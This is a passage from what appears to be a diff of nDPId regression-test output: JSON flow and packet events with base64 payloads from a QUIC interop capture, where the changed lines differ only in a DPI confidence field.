00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434699,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1603816434699,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434699,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAFhRAAEAR9f7AqAGAEr1U9dUqEVIE7BnSwAoKCgoIQzGFVS1wWEYAAETSpZ4u7UFA8Ku9qqY5kvFyNpSxiT1VV17cPvqBwMv7ghXKw28SABJKpVUQZhos8gZxtncfEnCPtRM8w32S0cMZDs5YJHMDp+qFqUFXljAhASDeFUYMjqqmqK2xXAN3z8w3vQiOdFiUtKcYWIVDP\/7fu1wx3cHjtnddQmoALaCYC2KIbsUH1tUKq7vT\/+BVt77LwCKryVjemBqkvXXluDjghTk40ivSQ8jJyGleEHicaKXla1GVH498NloK14kN7wg0ok7tb2sKhAfFsmt0dyCnuo0IC82\/BgTcTshonNbNn8yhRQBgaJANTlBk2qWY0ux\/DsdHPsovpEqFcqjpqtsKjJ\/5p6SGXORi9dQLphct9xf1v+6F1wTFVWPe3eHdsSOyp\/BwELawr\/f5+1egKWq7+4mbOVH+FCDZRkNVIFyH23guM2L5ae29avq\/lWL8pVDtTjf8abgfWtxqcSisE4YkAeGaq1eE5OG55ZyClHKNDn4L9XZjjbN9CQ1GCe\/OFVXpMI2PfEiWcGmIKeNgYRq4gzlAZODLuPV4QBEq7ZKp+5NVSaLqgSfrcH6xV4wE+0j7r5VEhvr2u6n\/\/bPNSsyoQaXU5+q7Q0w0lQEj77lMwQmrPw8Gljv7480G9NdUwkd\/\/p5S1RtQdUh\/qH46a+7aNhOrRHoFY0Uu4OeMbqyUyS5uevO+F6ddSemZlHL7dBD608g5QoisaEMsylH8q+6GxQ3RHsnKKd6RLtVMJcIb3s7eslhdiZbkyC8WugF1Uqbss8ag8jYafm2G3uWVNTOT2Al+MzrSr8taRs+g5iy1aJrDEMOzdQltsGCgG+PytPM2beF4Lq0IbrxQNCgE5IJ8\/Y9zeDmnJ4YuPZxOPAfYb360+E01gUjgcPnkzGMH3BDGaQWI5R9EypmAunCrFBomcVpqmknXQt3kkvX2OcNmQNIJtzXRbps8SEeNZRyPGf\/u+Vt+vdAKZlK9BUH2ROm9VEktt\/tTi8rHZSmWXH5uaAhoAcd2e3heLdg8ch4sYkqsJ1RM4Bd84Sjoz2WT\/JoF5Jn56aKdYJgDXqR10AhI9yS7PKXqAOUJVXWVnPWUzccZcD251mjyMn\/3GgjEsaksW4aLFNi7f\/QSOqeUIKFWMvnizPSh25WGY5rgFsH51tkf6hz04KlSxRXrJr0LIOYpZWWk4Z9QNd1K7akZKN59RDZMEAAGot\/SFcMVuXXKWbOlkRF3PR6IvnUq9PUtkadRAtAQNhw2A0EhGpp4ig24HdCqTnTlX+RSyn91Y962otVZtd4BhAeT6BQzG7\/NfJ9QU0qM31UlaB1H0R3mj33T6fLRu\/gftOixAPS4oO8hH1yfhcS8101GVhNDngCpOFPDr4rVR5IXS0BzEmSymuwkNKBp\/eXteAUsH19jQgtpJlB\/27Cf644Gbzfhi6gaDA1HPNpmXHxNHTWNp3TatC1i7mgiF\/z3wnwpcgZfu7NgfWsvkOlTH1JrhvlpguHwOE8X6csJxnEP2vFDhgFZ6S\/l6TWUOJpertvpldvGLMawH9EAcvDIDM+HIUbHJDdTMzgDd9oEnVJHFpIlh0JUOzKA7NaFr5ofLRvRbxomK6JpYR2wIpU\/OYM3aMfHBOnsu4q\/k76iU5zYtsHGX5zTrd9syVHbfA=="} -01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434699,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434699,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1603816434705,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1603816434705,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA3PkpAAOIRsJYocL88wKgBgBFRtfAAI3\/u0QAAAAAACFIdWLoQ6nMg\/wAAIP8AAB06SjrK"} 00640{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434707,"flow_last_seen":1603816434707,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434707,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1603816434707,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434707,"pkt":"pJGxgjQ5PKn0qB\/sht1gB7v\/BNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUr3wRUgTYXLjHCgoKCgi+3m+0woW7wAAARL68vqjG4rI\/AvdsCirEkqkyqlwlEk0N+rawpRZGeCeIU2ZO32fsIEz3GXMviYe+v0IBqeytpgNCeytK9t+KOjotJ7QVqpveJICd7IlMjO1HSAYVU5lRgXMoT+y5Fi2RUxr4qo\/CS3kZAFjeRFuCIjbZwm3OtOHC+vVlVA\/Vw\/zluUbCb4Z9OC05o\/XWJAPFWPOrEt8\/bTpMWLzNYr6bh2AAai1D3O2xoHVdm8ri3GSO8bUq2pxMjIn3ptNmbrkSU87wQZXGqhVeWh1ZsC0DBFqUluwXb0pMgCqpEO80Nhq5+u4y4i3hGodT0H1FKzVcs3ew3eq9vaguwDBdaKE4exJJv6RCncKSyg4heYydolHckhPW\/oY2HqheA4pFoO8ZtX95wKBFjVm9bJpYTJJY\/z31z+aUhWVmurEfLmnYxlCSy12hLAruC+gNCD8kQ\/MW4jyBAG6d7BTS1znq6T231\/W7l3AXMCvXfMcFqFuj+gmi\/S9kywNWZ1fPa34hHlg7mTIWR7jlUo6tzEfq2oqDEs+5yTslMb5FZJK8ldyYKgyBcGRm4I\/ToW88j5u17EMJLsfUqwGMs8bmd2UsI3BzwJywAmNYdLVpOCfPHEMiC8WRAAlJ3Q+5SLhd9OVFXGtu7O6XRhOsbmI08WdrJBm5J9ucdgzWkbl3i\/2eDZiYxTYiiBKrxh1bpbDEXg0VTkBcE5jASPmJB6nxZm61WNxz7BBfHP5VadrI26UgUPsDMVwEUXD\/xbFcS2J1PJleFnNI2j+1DmMCTg5N9ExM1u3\/T+Y0uyk6l54KxtzqSgjBsg\/XhFcM\/ODubgSuXCIsXFgZYQWzYGSVjfGtlg9HMWTHqZ2juNRwZqE5L2Y1hMws3fsY1ili8zQQG6pzQd9m5PP\/4DGWVRfKxQ1ZOXjzlNFvAo1T8tuTM\/f+7uMOnSwbTJyF4JRbDwJLDbu2BiW4DyD++iUHI1TX2h0xwwlOfDtDU\/XKqzZV94CRnghKvgLSuVmReTC4nhbhAh1QzzHb4eVcBbud+vGs+t+FDW0s9Oe\/hnHEEnZnUGinZBTzGSWQRNGZp3cg0jUT4QPjdPy8XyC\/POLdeCDrPUB9mDaW3W7rOPVTXvP4IQV+x5zM0ESasNezQs+QGprgL1EDIBS8hvpGgXPlFZ33Fo7w2YppnMED08hMlvAS6uJ4t8YNFbTXcL5HnggJFHBH27Bm3yvE8hbfH6SwVufZ8xM+Tw3qfg4V3lxg8P8AwO4P99Fk6O5149Oq6tAEtMX+WnBYLaxWrBiKCCuc5plEPAU9\/ZoPaf8l47lpmb56KdTriyN73TanAKwfbP6jIuj4uNIxQka2RGbqyo\/uLCe+FVRjf9R6E7hPl6i9FsmDl51lDdfvDGWrftns8EcWHuJT1pCO7UIHJob2JLCsxavgPAwXAF3a5o1+uVFCKwWrw3snRqgYx5CEEXaScXy50PTK\/knIkowD2tWEjgiJ8xxxjFamG8tuawm7Urqq2+BqDf1V3I5W+o4QxOSaFEJ\/SP7Wg3EEs5WP\/+ds9hapCjPQlUIlkyNKi8R+ri6pcpgmc2WXtbdLyKWIrR+mhOTL4VpBkPN\/EhoXvYOWO65B7Ac2ZRH43fZmgo68Sg=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434707,"flow_last_seen":1603816434707,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434707,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434707,"flow_last_seen":1603816434707,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434707,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1603816434709,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1603816434709,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA7AABAABwRNNgSvVT1wKgBgBFRqdMAJz2HgAAAAAAACN6xPRoCi6ch+s6wAvrOsAH\/AAAd\/wAAGw=="} 02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1603816434719,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434719,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAschAAEARJZfAqAGAg58YxobPAbsE7L65wQoKCgoIJv2XczUh4RIAAETSm4e+jGeUlE\/B12fljD+RqcpH47cYVTGlgRrNPB1pt4i\/tbOCC9Ip3Az5ZlXd\/FK3y+qA0RLTj+Hs3M0j8vRCArTbVM4C5NgRxsbhmviOgStjfj9\/bYsZv\/EjOBw1tJ7JBggMh5UbD2IApoVeQbXiGPK49HtmmZ2e8vNh\/DENBlDkfNiA\/Ze5qo3h724av1SIVZrOuvswt3oWie0bK5Roue+xJHmSYlIdNZfnzXpwBh7c35jaMUWDvYBeZmckm7kJc\/YlpNj25UQZsKAQzZSxGyFkwPWE1VZIIf2sR\/CiM5RFNmS8PgkHq67u5CQ3Sonb6Zl53+rO66OPeJhUkGQNaSql8mMy7iu+inJtNa+Jv8r+Mk+hsReHOd3O8emp6fJ1y9UM73fh5DirDtvnZZ3V6jRJ2r4Rygc+0kMBn4CyZ+getScc\/+R2siF\/4EkcSN\/DfCIEwaf5cBdqU7sUr9jhm8ebduyUf8MMp0mo8YLH5Ld6gayewdIiX7e5MgOtKMtgw+6gQh+Bv2MsHuSZkTMTDQf6U2V6WVpP0Y9J+TKxzWfaCPfnLyfJhAvO09EXRL4v5CauDRrgK66O64n5FFSoPkt\/cTCu2ZrnJUnl73ZUh5IMHcF5qrpyNgwYRdzmLOBKKUcbZsDmgTWWmVQic025bFbbeJANUemP9rPrhK8vpdcFoj5tc09KJOg24DVw0N\/8s0k41J4q5XkRqvAq3Jh031h89LKhx6BQhfHBc1CWUzEmpurvpV2Ys4EtVyEOa76yxKI9JcwQIwxvIQGEJ9wsNhbJGOcCGN65fV293I4+Q6O6oqi3DRDkz7R3WSxRmE3ALQUURzNbLPzkf5OpbRxMjRgBCXiLLxDLAMGYwM3F2kI+ZHH4x55d95IB1d\/psHRZShyVEYlzUKCnwu29d26MEawfpZVAaMzVRo7xXV35ZRY1D8\/9qSuz0fyLsjjlwkVcHKzvWu8cUA31sZxhNy8BdqKz2pVYPgrewKlXoKgRl99L31koA071JJjVhvzH\/gU32UecgmYeQp250l9S+wco1ff4R4UyUmOfphDkNe9Tg\/fRpjxgKleIR8kU42W8ME9YzuK+U6l+SwzLtodLt+wCvEs\/5vVCJoajkAEX1WivqyUrV84SFPKxXwpiL7TWr5xgs9A6ntAG+LEQ4Fzm\/5n84NssQOABVYGxSC+XA8kEi5T+j7oP5Z\/shgDlJzIXGmWwZLuGT\/FxXFjW5dDx3DqqqjLeUaGgzxk\/EyBCH1h+zMLqNGXZu5UCHMlMD0h27AhID+7gDIkyKn3TFzqvA52QgVRJ5KzL9Mb0vBqkit66U3SK0k0xi\/SfXE85fTw0NQH2x4wd\/v387iGFuVPBH6D0J7PwX5flRLQgBtOy5jnJbhc6rzs0BouQP8a1FymWYQx9YUWzK8DXbNzSVWzXnmMxjgztNz1o7b+kh5m6wUcvmLd6ZGQW6FIkZrd0dtEs\/RrJ1+OEeg0MfVSwR9Ik1PmVJoBjjnSVS\/EB5t+GQt0btx30I4eSEVuRu2nS\/9zrg3dvua9zEzH6y3wCr08vFuCZT1u8r3v5iOQmHyKv5pfKvsINf\/+Z3UqZAAlmAb7gj\/svvnlt+IBIlM\/2nf4NpSTCux5l816mDS9Bl2mt29n21gH0vw=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1603816434721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434721,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAzsFAAEARXhTAqAGAilu8k5wnAbsE7JrHxQoKCgoIhyfaf9ET5OIAAETSThHzecvOQHDw4M1KEvEdEUCr7CAD3OCoyACaSfQrzochTChRx6wrvVz+n+iOMS1T7uOrLABH\/lkEcgzaWAuVRzM5GGhP0QAKdeAxNm0AsijqoG67hGFscKpx5Av3K9sq9rDX7Y\/VGCtKE++QbiaTUGCfsHrykmsrI7QPeSxlf3ybNOigAkts1eOpMwz25k+b9PnMwdGgxKqc+p7n+EcjPFQejHtIcCrVrKASMN5dFF0N\/aceKWgkpv55cG51Qbpmor1iK5rkX+Jp2MWmVKxJJKA6VEfDmOs8+rh9\/bYDHg0cT0TQf4Zr2hLCg6RgKQkQcpxpjnqjjVnWbgl6v1vpjXEkfqOp6LQ7SyRj3OKJU+CC+q8T3ZrAxjtbgQTH6BSqNj5efXKABdLu2ZE9S1a376exw1gxC4aD7EfQxqzjGirRnUARwvI2VMbxxc2dHnrZzXTVUrVa81Vp5nVMETLO1bny7V5SddubE07uIzwFndMmsYTjkTJwD5XPAMks1RFaNVtVW04V3zer0QaCSFmPpOrKA2ENZYUXRl+1Ms5r0ujaH\/BvGzVlt7DDNrWHHosR4VC\/ma1LSnbA+WH2DeEaYdOBu9k38i9r4ijFtLZ3F8QT0b+bWuRxlbf8JzOO6XJygAjh4eIcY9Ifn6Ag7e30VziB3U79j2fB4F\/Mt+Uv+l2lFBFVyIRYWLQl09QlzkOdaohOuoVGT+vunC1+0eAqFF3oxCobr0gBT9\/9LcLUFdypCpP4\/SwPWvfF+zqYocBjePElav4+tGCKrt\/mkRyKvh\/nYulR4dFSm9pIzgjYoT78ZAE2lNPXyk6\/wkm6W4x\/Hk6rPPDi5szKTPrrB0V1qBTNahyFnb9FvHoXB4fK89PmOZMp\/yecWo4kP\/4lCl\/0sXffd\/0V5mQwriutI7UUKJmZLeDjdWC8J0aU6CLm\/SAEqxf88fV5pVMs0AYkAPp\/9j6IANm3UDJnqgRh8cV1\/31bcLPsjWchpJZggmMYkHI2wDN3Sl9zv+cjKCe7+jCl4jW8L\/ekF6HvMfC0eZ4nbal4FyAx8lo4Ue7X8ccf91\/AaqxYlfnlLzjGSpAQtt5baUgZHgnmszaHCnFbo2HHjdmmeu9Y473RvYemO3l50MKmLZG8lmdXQYv688u9bT4irxXqmbHi\/KHwUDOgFg0j8s0Y\/EmH\/pUgZCvgDFCtWtE6OW\/Hyq+5Cq\/HLgwB+IqdME7iVh3EnO3YfKXA50YgeqN5yY5ZNK6jO6v4bbk7\/wLtWdLdrB98VjrtJxA3EfSPn3vx7DFBmIWTYqLE+TpavUx0HxH19PjHereWaV9o6Cgs6+3PWf4tHc03d1rwK6f0xuBoogN97dsTvTJpqwpURumirQKVo3x+5CvP7oOU957Rt\/07vk0ZfIXTZECv+R5Y+R5gZfgoFzxzcENMe3qIbQZk8PFnchoS4GL\/8Y3H5Zb9Ei56qun9YxSW1Biasm72GWT1NwX2gR1bQjPxGosYAY\/6xPeLmkDAtOOTQ4g1vxcLLP8ZY+VaGsUNC8YbA40ig6LjBd1CD5E8RiAqEa9E2sD4lNd4+rToxZT0gmByW82p\/TzmPxSzryYrUGNjoU4d233l88kz7+WQyjC7tX8oBOiRLI2cu8Cgzkq+Qerk7O1ahg=="} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1603816434721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434721,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApPtAAEARh9rAqAGAilu8k8YREVIE7C6GxwoKCgoI6izyia7+eS8AAETSt+QbRbxl9Fm+cZhPehbbyuY4X98qiUiG97DtvQxOnW4mI8Cl3JV0HG80thoAdqQu1a\/K85y1Ygj5RP4637KMtJIeTQw7yPPnXHP0zU4RjZ62TRhNYZ6eNVI8rDTqX1U17UTGdzCJDQ6P3bwSFn\/hecgMOHAgJBSmXtzvmrL3MX129OuthefAiwdrij8dlZ+1POyInLQ1s4zElf1Qtel5JDZstCNGEQMu3Yksb7Fp8N8QxRhMiYahy\/rNZuX1sDo+S8Kt0f4nxECcA68o5O3j7RZ0UkQbCk7TY7P0k6hNhGbG8k6dzns2FDeBH2AWR18Xa6EbgQ+OE51BsT69F5Mw6Qv4zVxrj3nvm+j8ViswJ2lGHUVv\/wERdeEUkom6scesBC8GBF5oO+ERsonLbBlk0k64qeF0Mq16CQ2Tk4A1XJsEkeKkk13FfpgZ4xmju7ZvBKg6vyEj2GwP\/prZKaMYyek4cy3+1jkURWmaCVIJ30zt\/SxehiygkHDUiHnhD4bbKnxoZnxLWYNZlzO2olSPOXGBVUKEmol6Z1tK9f9JtrTB1m6tWsGbvwGSZA1y816T1+9q3kC45+v+o6ZmsHQTQIKTABYPnt8Wtf0hV33bQFBnhVsk2Gxdzjdom1ZLnDG+UAt4D1lf5cwBPUEisJIkPJBWS+rRvxC4DSNxciNVRjBHHot+7iiljC6QJOc8tv9ovBuMSSgCyDMe9n6HZtnwKuFrJijK9sqICpmLcJkRKxtUrOmfIadJlbAhdaPlAaOtL\/gMLjBp5boNC8pc8oLdF5gMKu0u6JrSWcFM7DMe\/SsSxMHlXi6oim5b0Bp8EthbxMMoLevrzbay70814zyI4WTOGY9vs32q1YnE4xZtSITnSbueYtYs5y6gAD+78I0tPBp\/bsV8QK5jclDqhGJvB+AVr\/WiMRT4OB9wSBwZXgYvAqWVfPSOkoHm3S6eJCcDs9F2x+hzEigXYsc84EvM4A1FCIAV7dO57go8nEQBW53ScAoMrWnMLYP0jkSI6suyGhiNp+h\/hClT+r\/Op92bWLS0pmZuvcNoTh4NLNKHapDtFwkQScIFRJ5B3b8fbGgludLcc2EtUA94Vc8QXVeNTIe0oP4s79m2XlQxy5y6O6OOkdY\/eUiYY9ApibduptWlMeUaNEA943We+rSbYXAEwOAraCMgbo\/PxzNUEPSqGnFDmTG9n+KnmYQi\/Alvs3QfYLLJt92WPsYBjHomiJjYWrbbdpMsFSvM2JeGnLfPMCegUq7+rsZIXjLTFB9Be+d9JUJ623MReNEYoMx8+sr6dCv2Gspxsl42k\/5L+7+ZDtFPo3XT6sEDxDYJvaEBjW39mG5b7C2beKtDSKu9M+wzWHdHw90KV7KS6\/DYWbLEkLOhVtsHdqM\/8MkUyr0noHt59IlTRvNBTWfpVdPC4nFiuDekpKBrvN+3EkNvSU3PCcM3kbQrdBSuFh0g28\/mzkqSAv0ZX5bxXIyBY6lC2UEqGMZo8UOe\/BO8r+hCIJMGZ7nG2fzy\/+YOPtJrO9Mb4J6yQmY0rqVI+EvjNDPprLHMCYe5Q5VOAznPM\/b5ELOgKrzgym72uZNPWn3W6OK4K\/yCjCGoXsltbqumaaP0\/hRyLF6fCMMUuvnes1g8uU+5d9gQLw=="} -01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": 